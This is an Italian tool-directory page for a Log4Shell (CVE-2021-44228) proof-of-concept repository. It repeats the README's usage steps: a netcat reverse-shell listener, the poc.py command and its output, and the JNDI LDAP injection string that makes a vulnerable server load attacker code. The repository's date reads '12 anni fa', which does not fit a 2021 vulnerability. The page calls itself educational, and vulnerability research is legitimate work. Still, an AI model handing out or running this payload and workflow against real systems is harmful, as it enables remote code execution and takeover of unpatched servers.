Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228-demo — Prova di concetto per CVE-2021-44228 (Log4Shell) con configurazione automatizzata del server LDAP/HTTP e generazione di payload reverse shell per test educativi. | Kitploit
Strumenti/GitHubGitHub/hoanle396/cve-2021-44228-demo
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubhoanle396/cve-2021-44228-demo

CVE-2021-44228-demo

Prova di concetto per CVE-2021-44228 (Log4Shell) con configurazione automatizzata del server LDAP/HTTP e generazione di payload reverse shell per test educativi.

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4j-shell-poc

Una Proof-Of-Concept per la vulnerabilità CVE-2021-44228 recentemente scoperta.

Recentemente è stata scoperta una nuova vulnerabilità in log4j, una libreria di logging Java ampiamente utilizzata in applicazioni come Elasticsearch, Minecraft e molte altre.

In questo repository è presente un'applicazione vulnerabile di esempio e un exploit proof-of-concept (POC) della stessa.

Prova di concetto (POC)

Come PoC è presente un file Python che automatizza il processo.

Requirements:

root@kitploit:~
pip install -r requirements.txt

Usage:

  • Avvia un listener netcat per accettare una connessione di reverse shell.
root@kitploit:~
nc -lvnp <netcat-port=example=2034>
  • Lancia l'exploit.
    Nota: Affinché funzioni, l'archivio Java estratto deve essere chiamato: jdk1.8.0_20, e trovarsi nella stessa directory.
root@kitploit:~
$ python3 poc.py --userip <your-ip-address> --webport <web-server-port=default=8000> --lport <netcat-listen-port=default=2034>

[!] CVE: CVE-2021-44228

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<your-ip-address>:1389/a}

Listening on 0.0.0.0:1389

Questo script configurerà il server HTTP e il server LDAP per te, e creerà anche il payload che potrai incollare nel parametro vulnerabile. Dopo di che, se tutto è andato bene, dovresti ottenere una shell sulla porta di ascolto (lport).


Applicazione vulnerabile

C'è un Dockerfile con l'applicazione web vulnerabile. Puoi usarlo seguendo i passaggi seguenti:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run  -p 8080:8080 log4j-shell-poc

Una volta in esecuzione, puoi accedervi su localhost:8080


Ottenere la versione di Java.

Nota: Devi creare un account per poter scaricare il pacchetto.

Una volta scaricato ed estratto l'archivio, puoi trovare java e alcuni binari correlati in jdk1.8.0_20/bin.
Nota: Assicurati di estrarre la cartella jdk in questo repository con lo stesso nome affinché funzioni.

root@kitploit:~
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Disclaimer

Questo repository non è inteso come un exploit con un solo clic per CVE-2021-44228. Lo scopo di questo progetto è aiutare le persone a conoscere questa vulnerabilità e, forse, testare le proprie applicazioni (tuttavia esistono applicazioni migliori per questo scopo, ad esempio: https://log4shell.tools/).

Scarica lo strumento